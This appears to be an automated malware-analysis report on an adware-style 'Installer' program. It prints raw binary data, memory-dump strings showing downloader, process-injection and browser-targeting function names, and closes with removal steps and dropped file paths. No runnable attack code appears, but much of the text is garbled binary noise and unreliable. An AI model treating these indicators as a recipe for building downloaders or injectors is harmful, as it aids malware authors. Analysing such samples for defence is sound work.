X-ICSCT-GICSET: global13712aICBA

X-ICSCT-IP: 37.57.16.189

X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7102a8f9

X-ICSCT-TIMESTAMP: 20160423201222288

X-ICSCT-VERSION: 1.3.1

X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a

X-Robots-Tag: none

transfer-encoding: chunked

Connection: keep-alive
1ef8..FF..Y...Y.i....1....>0..........,...n..q.....................
T.9$.........$........08Ja~<..\.sJ.a.^..re...j.w....t-..PA.2.bp:C~.
.#o....Dn;..Bv0..8...DB.'.p...F:......GSv%\G.....g.EC.|..:z..0P.."....
.....>F9..b#.N..*sb..s.9........K]....Vw.W.A. ..W.Td.;.).Gn)..8..._
g.3_...).:...<?..6.5j4Q...&.2}.R>.J......*..._...r.&....JLHd$`&.
...k..../%.e.._1-x....Qk08;......[3P.......Fw8&..i.v.w ._Z....i..A.W..
..4.'...r.@&e.Vz....k.:^....f..P..TT.....).n..2-V......h..Do.... .["?.
!d.....,....|.Yl.mw.jm....o...P.k5..bT.&...".[...C.....6.p.i.i.v:..nj8
. .k....^.-.2.R{.&7...r{..2V...{.....n2y....'&7...bz.&.<..jz..2w...
..#2V...{..1nW.....h...2\7.>..n.n.k .hd0h....unwf..2B. ....0z...r..
.>.......~973h..Rz.f2...2uW..:..2sG.n.......3>...... ..>2s..b
z5.5*..bzS.0n...{c&<2....;..f'..p..rz.&?...|...3`.."{c.....;..V2...
....~.d.E.3...Foti.G..U7z. p..?......z..s..[A^.x2i..z.B.\.............
a{...W7..E.../9]Vg0....w.A6v9...r6fP...Ww......sO&4"...z.ceT...& .jz.6
3@w....^=....../...[..F.g.]...?.P.'..C...x[..... ....f...|.w.LqR~.q...
..=X.V.c.....7,....8.(pYU"..#..&.......,DCn..m..;.Z.K...6.....v.4..._.
KNC.. ..z.F......&.KBjf7r'...]BD........vR...2.7$\.-...t.....{.r5..-.2
.r........K.o]..S..=.l<........Yy\..O........h Q.c....9.H..YJNp....
v......x.g.^.Vb......m|.=\%q.jWe..:.............I.....U.....r.2r.C{..J
2.<.=1.......`a..1.'...$,..&.c....]..P-.7H  S..#.=8_.........;.M...
\..]..<...iS.kSsL.3.v.Y.A.s?.TvP..e.q{...m.....\..... zP...........
..P#.......T...2..[?}r. B7.....1...{r6..<...v...h.>B:S....5x<<< skipped >>>

The Installer connects to the servers at the folowing location(s):

%original file name%.exe_1124:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

.DEFAULT\Control Panel\International

File I/O error %d

lzmadecompsmall: Compressed data is corrupted (%d)

lzmadecompsmall: %s

LzmaDecode failed (%d)

shell32.dll

/SUPPRESSMSGBOXES

/PASSWORD=password

Specifies the password to use.

For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline

/SL5="$%x,%d,%d,

Inno Setup Setup Data (5.5.0)

Inno Setup Messages (5.5.3)

user32.dll

oleaut32.dll

advapi32.dll

RegOpenKeyExA

RegCloseKey

GetWindowsDirectoryA

MsgWaitForMultipleObjects

ExitWindowsEx

comctl32.dll

name="JR.Inno.Setup"

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

1.0.5.a0.1_54944

%original file name%.exe_1124_rwx_00900000_000F7000:

.idata

.edata

P.reloc

P.rsrc

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

>)a9>.aV>

.EXatuv

.vRLFO

g.rp=

asT.qykp

.EW)$

.GYonVz

N5:%C

.Rtyz/

v.Qzjab/Gdg

<;_)5<>^

.nk"n

8r7Q%c

l9.ZS0

%xJQtW

n"!a.zo

@NtcP}

%XRHt5

$".kL

.Iz\(

Ub%Cy

.rzOn'$

.zY3-

c$%xzl4

Y8|t%d

C#h.np

H%f-Uw

.mlw3

_Jÿ

AciekeYifeS;x

>t.hk

a.NYc

C.oaa0

c.XAs

duudpyq

z=%U;Mna

i%X'ze

%D'[b

e%D%(g

`-AhsrPb\oK.dfj

2HN2G%d

.fh(S

.ZjnkUo

YÑx*

.tsvtz06*_pj]R

V=-b}

rbg.sg"lj

nvze>6%Xj`

lZgiqpWqyvaH%DH

CmdiHcJ(dTv

%Cj^H

%7uC,D

.BV}%

".Ndqn

.Eidi^D

QER.CK

OD.BL

'8503333

g%XFh

:#cy%F

TÉ-

.GKzL

p~t%uLp

.IOt8t

U(.YJ

%dizhkpe

XX.syB

;@37=<;43@?

P1@6084(>%DSUX

=73<M>=.Ux

850>\`)9

O#%Fo-(

Eaq%f

!.PF?

#ZK.sr

.mmmlm-A

.vhWttZi_jF

dnf^n_ang1%Dqc

UFLZ%X(Ud`SVH

UB^[email protected];

.de=8.

_&3 g.tE

n.SJ7

n%CQ,W

ly.As

Yk0~f64eS.sv5

mGz_mY%C

.DD6'\

_cmd>

R.%C=

%CH:8j

.uvDcmq#0

.EbH8

!L<CLC,".xjJba

z.Mc:d

4%s%"

.xVP$

.eavuMe

7X.rk

ztYm%UV

-eh#%C

)ra%X

ttcpr

SSh_z

kh'HSg%u

.nleUdzyd

(5u%U

U.GFr%

VL.lpqagjy

WÓ's,q]

jX.YS

.msws6

n&%dj

O'%S2

zoh.ultbi

wulfw3%XD

/Kx5%X#'

l-kfp.uc-x

2f-q@%U,_

a5X%sT#

f_i%U

PYVZ[SEUYYHV(36.HPR~K9

jeZy%C

h.uFf

$.BFU^m4

ÊF[&6^

@0E.GT5@=N2

c>

r.Jxu

=K.UH

%u7.kK

[email protected]

jNnz.JN

uA&%fl

;l$%SR(

tr.aT$

`wu2!a.NYDU<

p'.Ld.PM

F>.Aw

Q*[H.bw

?%X2!

rBi[.Ku

#?%f.d

!E.Jm8f

HdYfabxfbaHxbtabFdfbVtftpbx

user32.dll

GetKeyboardType

advapi32.dll

RegOpenKeyExA

RegCloseKey

oleaut32.dll

GetNamedPipeHandleStateW

GetCPInfo

GenericLoader.dll

KWindows

{E=i.wA,

/,%SU|

aUs%d

os.yt

*!.Jl

:VB.tr}

o.TWUE

2%uuc

D%x4@Y

a8.Oj

?A.Wu`

.izL7

|Vi.Ws

}{%Uv

Ís'

$J.jv

i.Xan

#A.KVgka

%C=Nm\

`aVjX(.PY

7d%x.I

s.CqC

(kP.Az!

9}.rx

.do5b3[

~GßT

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

I/O error %d

Integer overflow Invalid floating point operation

%original file name%.exe_1124_rwx_00BB0000_0009C000:

.rsrc

kernel32.dllwGetLongPa

ORT_(_.SCK_LI

;.OVI

Keyl;

7.jicA

%s[%d]

%s_%d

.Xl0'

D.qCV*

.FDiag

Boross&%Dt`x

O7E(AL("%s",4),"

%U}H!

IA.ZZZI

.BWHi

on.XiS

HotkeysK<B

.CC[p

.Fjei

0J.WM

%x@`0

m=v.tT

-a.nm*

D8&%uG

tLcibD.ZP

jn^Io.ye0t

ToiZc.Xhj

%Dl!%F

,-\ T,/.Om

_^Cwxkosx,.vl,,

zpz.egz6

7\webqs

I.PPT

|1lnax.kbjqjfy`e

Rvbgi.cjhph

-I.dG

|9o.Fh

fkhb<7 Si_.huJz

%XH-e

].jlg

luYvT.whxyW?

1.2.3:d`

THttp

,M.DJ

oRhwbG.xO| O

ic6.fA

,0489999

yjl.hhp

mw.ll

d.vLO0V

.dsjeit/*`hj

.lnkk&h

f(,.hgzc[gkF=,V

l6.LF

CrTHop;

.ibJn

rPWR.DB

.po{)y'

v/<aZS.So

gM).qd

^.ex-

;`Q.Ro

'-iagt</.Vq

q.TkAi

S.hJQ

/.CWM`bku*

 WT.yg

(.yo@

5%sY@

3ß3$

"O.vR

6?0N2=.Lq

W]E).rG

nt.ihM`

Fc.Uv

*,.fdgj`$

J2t.cr

\).Yw

5/.jm

 %S/NC

@b0a.nB

Y]H.ifs

.Lb/[ynb4huO*bAe

ix.CBOPM

hy,.kle

>.Zg{

/.qVw,

ir1.FF

TPipeSl

JAC^@[SQWLHEM G.sw4

0Nm5(.mS

[URNDT].Lw/OFL[^\\[@IAJH-

A-_.pwY

%csFLh/

QsIE%f

LJ_.ge

ym^rk.Um_gt

Dlb.vok

@N3%x

IWeb

grfKey?6

CmdG

=.UtF

.mI2uj

'%s' (

9999$ (,

.ftp:

s.YwB<

[%s]rBN4

ki2.Bg@

un.jE

m%d;k

.1..WAHO9[Zcn

\EXE}/

&^M}.ja

[email protected]

BLOKPERHCV.Zblfn

zgcEi.Tc/h(ZA*

f[VT*.lJ,e

0Lm,.uomy

!dMSGo

:=.zX

anldf.RW

IaER%S

e.HvwVty]

r.vY?U

I.HH8

.HEo*

2<3'.rB

%5u$%

o-F.Dwiyrcg

JS_>.NI

mjC.Oon1I

jehGbeags.qBhkk[l

NPIPE_DATA'

@[email protected]_^.e

N/d %U

HMVH9>.PE

.CONTA

v=.vN3

*Wr.Eb

R.aLA

`.NrG

m.cV7

BLv.pW

lHwmTo.txJ@l

xEXE&

D.DLP

.TJNaWTw

?zfc.bzG

u-f.woaq1

]no^dun.Vx

.Mmzep

[email protected]

)hj.bR

I.XXPr

GUkszv.ra%!

Z>/.ory

.TFHAP

{"5.Bw2*W">

.>p.Xjg

r0 .Sp%8

.mv~0

I3j%D-

;O7%s

1.Fy<*5

0-xV}>

L.gWq

J}.kU

=-s.Virtua

Key#T

"$ %),'8

$"!(&&$'

H.JXAfDb

 /*-( ,'.-!

*/.)*72-7)

#-**(-#,

.PMDF<7I

KERNEL32.DLL

advapi32.dll

comctl32.dll

comdlg32.dll

gdi32.dll

mpr.dll

ole32.dll

oleaut32.dll

shell32.dll

URLMON.DLL

user32.dll

version.dll

HtmlUIInstallerSADLL.dll

%original file name%.exe_1124_rwx_00C51000_0015C000:

kernel32.dll

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

.Owner

EInvalidGraphicOperation

USER32.DLL

comctl32.dll

UrlMon

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

TKeyEvent

TKeyPressEvent

HelpKeyword

crSQLWait

%s (%s)

IMM32.DLL

AutoHotkeys

AutoHotkeys$

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

OnKeyDown

OnKeyPress@

OnKeyUp

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

A`bng`@ikc-4,uUxlxs-4,Ht.HA

Vh-0,Cd`jiVhlxwd-0,tLcibD.ZP

TThreadExecuter

TScanAllWindowsCallBackData

Portuguese

ZkkdDocjn^g-4,o.ye

^ioM-3,iiziGmwItI.cG

\h-2,Jfal\`dgxj-4.DZ

,-\ T,/.Om

@gfj V,he-2 V,meaeo-3,jho-3,j V,jeju`,--0 V,krfuzy5 V.ua

hcl.sf

Cwxkosx,.vl,,oa`i-2,q S-3,kej-4,zpz,,egz6,. P.g,2

-2,tu-4,asqjj Q,gv,.NV/hnw/,,INJW^FZ\S@AZ^P\KSY\agqxos`S,,: U,nmb`-12 Q,af-1,df-0,bx U,z`e`-2-. S,MDKXZL[SWJ@UZZ]DWS]nc-0,y`wjRVjx856=@naj,,/.p N

webqskv`T-Y

oj-2,`ac<<*kcb.jo

ak-2,`ob<< T,jcb.je

IN]JVN]K]KJ]B]F^UF@@]\v-2,ujbRBjazsnc^s`lkr-1,`-1,].jl

7Teah P,Ckh`-3,fkgo-2,7*NNYO.uh

1.2.3

THttpTimeOutThread

THttpCallBackShell

Gx-21,\igh]ixyj-42,M.DJ

A`qjz``-0,ZkdkNgij.pc

Kcqjpc`-0,Aaj-1,gEdafa`.pM

Jmvgknm Q,2,,<,./accwcxgeni5 W,O_GB R,=>)27,.Pkbjhu-4-.,IV,,8)37,.Spejblx Q,2,,< W.g W

Ecezcb-4 S,Tmeic6.fA

Bc/K-33,`-1.jG

Jbhblnrefc V,H-0,bv-1,li.AT

Uju-0,c-2 W,Ht-2,h-4.Rq

Ijv-1,h-0,jm Q,Jq-1,n-2,/,.u`l,.lnmw Q,ll`oj`zh`m-2 Q,xjzi`vz Q,kbz`.^l

Q-0,iznjib Q,`u,.tgu-0,qyi-1,ulb.a-F

Ob-4,/dcdzfe, kh-3,`/r-2,jld.vL

V-1,ns-4-.,hx V,lmdeehea,.mdhi Q,hi`onezhdh-2f.a

ebP-3,dLfnda`-4,`yj-4.PL

Efqem,.wb-1,k T,bu,.wnr,.pd<,.-i.a

,.fivzjfa,.`a U,jjad-0,cs?,.W.y

Ogl-02,wo`i S,Kov S,ea`mcmzji`,.Qg`if V-3,oqgc P -,(.a,>

Ehvbbi T,z V,tfbcdw,.dbpz V,tl-0,tdf,.dfpkb W,l` V,Kb-2,r*Nabnegcc/,.ahj`a W,wa V,ufb-4 W,l` V,tl-0,tdf-2 V,ubzct,-.^,v

Gj`f)jh S,fp-1 S-0,`-4,vlvzp)d-1,f)uopzl`d)l` S,Ywa-0,p U,Clm`,.,.)v-0,py`mw`ki S,`koa`igwp U,zl)aatgiabm U,hqfh,.`-1,w-1,fgq,.plwxf-0,),.w-01,gmn U,omfqff-0 U,FFHA,.qlt-0,fzq,.wf U,cbb`,.p-1,wk,->Y

Kdaf V,ag-4,higib U-1,`t`il V,vmmkv(-1,i U,jm V,czg-1,`f(,.hgzc U-1,`gk(-=,V

Fk-1,tg-22,om,.zromb V,jgzeaxltkj), ,.zfi,.c-1,ef,.ji``lezgfh-2-.,jtko-2,cj,.-3,ozffsz,.hhw,.mgzo)tkmloxkm(,.Ifo`i)ra,.-0,c-2,zhtz,.-2,nk,.miy`eioj W,( P,i.i

Ebs-1,dtrgn W,uzldm,.inumbqc-1,hc VS -,sia,-ki`j W,qgyoi-0,y W,hkz W,eacicmyni` SW,Aadia,.yh V-1,htro-4,s V,zeb V,jbphbbfb PS,).a-2

Cfba,.Kd`-3 W,nwmb-00,ghe5,..v-3

[ofye`h,-ja-2--,mbc,-oaacim-0,dc`-1--,xa/n`a-1,h,, V.Zg

 UPWR.Dg

N`jn V,/egf/gddaah-3,fkey/eyo/gge-1,ao T-i.u

,.bvu,.be QC.Y

,- S,(yvvacc/ijeff,-ei-1,hv/-0,aajx S.So

Mnlgkc R,vk-3,wa-20 R,miamvkk,. T,czqp,.mg T,ga R,@axlhanf T,c`fa P,B.y

Zj-20,ej,.-1,m-30,k-00-.,goaa-1,mk R .,ez-2,z(mk,.aa,.^iz-2,k(bajm Q.is

^j-10,c-2,fak/-0,gi/k`-0,ac`mkj-2-,,i-2,`a/_ny-1,j/a`kj R.zw

Fft`n-2 Q,Cd-3 Q,hlbd,.sks-2,lao,.,-.\`

 S .,gv*jgclk-1,`dz,.qbo` U,y-03,ue-1,z`n,. V,^.e

Bo-0,jjt,.I`w,.gnizehi-2 T,TUBw,- W,lqu W,zld W-2,m-0,b,.mr W,ghmbiem=,.Nq

Q]byc/n-4,t`y,-bzn,-r`, dh-13,k`fhdca-4--,bfxf V-10,lej W -,iagt</.Vq

Wpmzgom`c W,@asihaeca-1 T,bv-1,ku T,mkca,.bukc> W._,t

[c-0,pki,.gfoawfxkpmh,.cf,,kpzc-1-.,(oafm6,.,..C

//Y-1,o5,,.gn

 V,5 U,`n` U,aj,.fbcb`g/akov,.cq`c U,nngk S,karmcadg/aw S,n-3,u S-0,fwfnj T,5.j

5,,-3,yo-3,y7,..XI

Pjk T,wg-1,rap,.`vm-3,taf,.gkl`agvgkj RV,haq-2 T,`cze T,pkgakxa` R,zlel,.vas-0,awvk`,-,,N T

Yjs-1,bjqko/Kox-0,*Cdknhbjc,.cjfjn-2,=,..bv

Wik W,pn-0,u`d,.cld-2 W,mnz W,k`xb S,soidd,.tvq-3,hqu,.* S,hiilskc S,soidd,.ufp-0,bpu P-3 C

 U,D(,.btkyG-4,>,.._,e

Exz,-ek,.`o`a-4,s,-yeoc,.Kfx-2,ecci,-ib`conzdec,.ikyo Q,*`k`*-4,k-14,h-2,yoi4,-.YU

]DKizHi-4,exc-1,Hc`hk-3.GI

L_LCUNTF, KHC.op

0.0.0.0

3?:96=>?59:;.ZQ

6?0N2=.Lq

;768>1-80

cabinet.dll

\fgejnhg,.Dhr,.f-3- ,z`b, -2,gbyz,..8y

M-3,pxahg,-Xhn-2-,,klahhq,-e-3 S,db,-v-3,i,-at,,lmbxef-4-,2,qbohp-3 P -,w-4,udmj,,lmbxef-4-,,bmh,, U,byxhn-2,x7 S.NW

000000000000

 ;7.Q,>N-Y,[ T,Tc.Uv

, /@zs-4,Kacj2,..cr

,./Z-1,n5/.jm

HhluHmad,.slr,.auu-1,enuk`,-g-1,k` Q,MM^,-,.vhr-0,hy; M,N

Y]H.if

d-3,tdcQqdc.Lb

TUninstallExecuter

)hix.CB

Y^`acxziagKphh-01,hy,.kle,.jh, mzhjzmi, afar,.gchk V-C.8

Ehnj^smekrq<,.jg-4,3b N

1,,`ir1.FF

 W,Ivgs,,Xokyk4 W.iB

TPipeServer

TPipeObject

TPipeServerListener

TPipeClientU

isrPipe

CJ[hx.Xu

@ggh,-O`uygbjht,.Retkgi V,kt-4,i-1 VU,nm

 T,5 W.Rx

_.Wo*BC-T5p7d.V-b,

Actnddf/exn-0,a-2,c-21--,@zfinj(-4,g-1,xbl-1,m,-*ffkm5(.mS

NAER_[URNDT].Lw

Ifq`afgjdga,.O-1,hjalu,.ihro,-hrzhdvz,-gi P -.a-R

Ea-0,xmcdi-3,/Ioo`-2,bx/Fmaj(odnfkik(huaiaeli``v(j-3,`e6,,.Cw

Vjfegl`,.cs`ms-4,lah, wkr-3,w`co U,lgo U,K-3,bqMio`4 V.`1

LJ_.ge

fxk S,Cym^rk.Um

Zndfkhb,-lnnaok, ,-o-2,ubx5 W.Ru

D-1,dgskhh`,.thn`rrfbm V,n`rru-0,brnaou W,hhjba.b

ole32.dll

olepro32.dll

IWebBrowser

IWebBrowserApp

IWebBrowser2

TEWBWindowSetResizable

TEWBWindowSetLeft

TEWBWindowSetTop

TEWBWindowSetWidth

TEWBWindowSetHeight

bstrUrlContext

bstrUrl

OnWindowSetResizableH

OnWindowSetLeft

OnWindowSetTop

OnWindowSetWidth

OnWindowSetHeight0

grfKeyState

TComTargetExecEvent

CmdGroup

nCmdID

nCmdexecopt

hhctrl.ocx

URLMON.DLL

SHDOCLC.DLL

rcmDefault

rcmDebug

DontExecuteScripts

DontExecuteJava

DontExecuteActiveX

DisableUrlIfEncodingUTF8

EnableUrlIfEncodingUTF8

CheckFontSupportsCodePage

DisableSubmitUrlInUTF8

EnableSubmitUrlInUTF8

lpMsg

PMsg

pguidCmdGroup

TTranslateUrlEvent

pchURLIn

ppchURLOut

CmdID

pszUrl

pszUrlContext

szPassWord

ErrorUrl

OptionKeyPath

OverrideOptionKeyPath

OnTranslateUrl

OnCommandExec

'%s' is not supported.

TMsgEvent

TKeyEventEx

Port

Password

poPortrait

OnKeyDown,

0.750000

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(

This object does not support this method (

Unsupported type for Parameter with Index %d

Method call unsuccessful. Object: %s, Method: %s, Exception: %s , Source: %s.

hXXp://

hXXps://

eiOnKeyDown

eiOnKeyPress

eiOnKeyUp

OnKeyPress

Handler with EventID = %s already exists.

Error on IConnectionPoint.Advise

Source don't have connection point for [%s]

KV,.nw``-4 Q,fogmgohj U-43,dpko; U.9,Q

MAPI32.DLL

LeftPopup

YR-0,xh]izn.cQ

2.1.0.0

This exe was created with an old version of HtmlAppMaker.

-0,cnyzgcEi.Tc

https

Sf[.t,T*.lJ,e

Iii,-Mrz-2 U,tk-1,pc-2,y U,no-3 U,rg``b,.bpr P.Y,e

Iinli V,sm,.uomy V,sjk V,Wpaaug-2,u W,datj,, W,n

,,`-3.XW

MSGALL

irsoMsgDialog

irsoJoinPath

irsoGetCmdLineParam

irsoGetCmdLineCount

irsoGetCmdLineIndexOf

irsoGetCmdLineParamValue

irsoGetCmdLineAll

irsoRegCreateKey

irsoRegCreateKeyTree

irsoRegDeleteKey

irsoIsRegKeyExists

irsoRegListKeyValues

irsoRegListKeyKeys

irsoRegSearchKeyKeys

irsoRegCopyKey

irsoGetRegKeyInfo

irsoHttpGetData

irsoHttpGetDataInThread

irsoLibraryExecuteProc

irsoLibraryExecuteProcW

irsoLibraryExecuteProcWithResult

!irsoLibraryExecuteProcWithResultW

irsoExecute

irsoExecuteDllInProcess

irsoSaveExecuteUsingCMD

irsoIsMutexExists

irsoCreatePipeServer

irsoStopPipeServer

irsoSendDataToPipeServer

irsoSetDebugLogUrl

irsoGetDebugLogUrl

irsoGetWebBrowserHandle

irsoGetCurExeCheckSum

irsoGetExeInjection

TExecArgs@

iubnyybRolkanldf.RW

b-1,[-1,e.Hv

.html

H-4,njBdi-2,o-4,r.vY

[zhhi)ec-30,heo-2,db,.ddrffe V ,,`sua[daGz@v-3,@ouzhmjkm S,a-S

-4,fhxXahcxgw.rg

gghYcjrf.ae

jehGbeags.qB

PIPE_DATA

PIPE

LNYCD_^.eP

HMVH9>.PE

[iinzx-13,)i`s-0,u,.ulaaqlh4 W,Axck\E,.E-0,cytl-3-.,hkfkd-2- 2 W,@I9 W,ombkkmml)-40,wyc-1,s)e-2 W,gcy W,lboeeij)-3.D

Qaflhj W,zk/cgwneba/sfa/OzicRG T,Muas-1,b-1 T,`edals)w/NK3/aohceogd WST,jnzlju,.MJ W,xa-1,naj/n-2 T-0,ha T,chy T,`u,.j`s,.eyfghneba Q.bo

Zcdxk, hy,.j Q,xklhyzyx*fjba,.-4,n*-3,yd-1,keu*F-4,lf[B Q,H-1,dvyky Q,eladiz,,r*GN6*hjmfljba,. VQ,lobmoj, ue,.ydga-2,d*g-4 QR,F@DSQGNIOG^GOHIC@N( T-V.9

Janko`h/o`/-1,rkncrf/bijj SV-02,c<,..za

-3,1 T-1,`-4,b-4,w37 P,abov=.vN

Fcjjcbl,.l-3,dc*-441,cbl P.fE

CI([onJ-3,e-00,ix,,lci^mbnAgho,,a-4,*bgx*;( T.CE

THtmlUIExeAppU

>,-Bbp,-hhw-3,dja,-c-4,k` U,ljbqea-4 U,dj-3,qljn`7 T.PO

HtmlUIExeApp

Rd`ahoi U,ld-2,v`fk U,un,.juikw Q,h`vu``fd;,.^ A

Plkwa S-2 U,ejaqla-1 U,mj-2,qejm` T,v-0,kjm`b( T,zmmw,.uvkm`ww,.rmhb U,ghava*^D

Oihpfbu T,gitpoida,.ni T,ZBUIGIFPK W,tpo`b T,gt W,g-0,uua`sk-2-.,urj`nic RW,dk`snj-0,nic P,)G-3

ung`.Nr

HtmlUiExeApp

gbo`dhfm.cV

^a-2,vmvzC-4,Ejoej4 R,YEM R,ew,.fewo``aj,.,,e-2,qyiglk T-3,pcgkq-4 T,fc-4 T,ofam` R-1,vgtehkeiw RR,ok`vej-0,g,,sgvdk-0,v,,vkqxe-1,veji,,,.L

Hmeckh,,-0,a,,-3,jcczj,.xdj,.,.V``i R,Fjib-0,gjej-1-.-,,Nbx_-01,imb.wI

irsoExecutePackage

irsoReportPackageError

irsoReportPackageSkip

irsoReportPackageQuit

irsoReportPackageSuccess

irsoReportPackageInfo

irsoGetPackageFilenameFromHttp

irsoGetPackageExecExitCode

irsoGetPackageExecResult

irsoGetPackageDwnldUrls

irsoSetPackageRelProgressShare

irsoGetFireFoxEXE

irsoGetIEEXE

irsoGetChromeEXE

irsoGetOperaEXE

irsoGetFireFoxVer

irsoGetChromeVer

irsoGetOperaVer

irsoUninstallAddExeCmd

irsoUninstallAddOpenBrowserCmd

irsoUninstallAddRegistryKey

irsoUninstallExecute

irsoReportStart

irsoReportInfo

irsoSetExclusiveExec

isroSetReportUrl

-11,jycmjaOaahDgvyc-11.Pg

zfc.bz

]no^dun.Vx

M`aigh/`xj-22,gkj/-3,n-2,nc-1,/iazak,. W,y.zy

\fuj-1,w U,P\O U,qah`k,.nlvcbqff,-U>

\GCAPMA][.oj

TcUlue.PL

W`mmqzeon,.wvamaff P,4.]

z`o1caig2,.hf5b Q,0cfh)914`,,34`6;ia2f=ae-3,L1

e-1,f.Cw

Jfafzjcd,.wef,.Tlwmkhq,.admoqt,- P -,=>

-0,ilCcbd.LG

)h-4,k.bR

^exmaa-3-.,oeebl`,,zf T-4,zhvx R,)tm-1,hi-4-.,hvi,.dm-42,`jk P.g,I

Ydvef`p V,j`nczlla,.lvukid<,.b^

Ukszv.ra

[eckbn R-2,a, kgg-4,khbbxl,.blzzjneky R,N[B,,-G.9

FbghLbtaYhe.AU

Jnma W,jv-2,h-2,>/.or

1.2.1

inflate 1.2.1 Copyright 1995-2003 Mark Adler

deflate 1.2.1 Copyright 1995-2003 Jean-loup Gailly

?456789:;<=

!"#$%&'()* ,-./0123

333333333333333333

33333833

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

[,.hV/

[Wu%$%s

r0 .Sp%8

I3j%D-

;O7%s

h.wWaA

1.Fy<*5

DK.kLQ'

-xV}>

L.gWq

J}.kU

GetProcessHeap

GetCPInfo

RegQueryInfoKeyA

RegOpenKeyExA

RegFlushKey

RegEnumKeyExA

RegDeleteKeyA

RegCreateKeyExA

RegCloseKey

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

GetAsyncKeyState

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

GetKeyboardType

"$ %),'8

38000=344

4? 3!0 3!6

&W!%D)*

H.JXA

1 0 .'7(2':

- /*-( ,'.-!$$$&'('/*) ,*/.)*72-7)

&)"%&$&'&",,/- '

944(@32%2u8

.PMDF<7I

2222444424

.idata

.edata

P.reloc

P.rsrc

#-**(-#,

SOFTWARE\Microsoft\Windows NT\CurrentVersion

errorUrl

\bin\SubWCRev.exe

Please login as administrator and try again.

OLE error %.8x%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s

Clipboard does not support Icons/Menu '%s' is already being used by another form

No help found for %s#No context-sensitive help installed$No topic-based help system installed

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic

Unsupported clipboard format

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to set data for '%s'

Resource %s not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file %s

Cannot open file %s

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid GUID value

I/O error %d

Integer overflow Invalid floating point operation

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:824
Delete the original Installer file.
Delete or disinfect the following files created/modified by the Installer:

%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
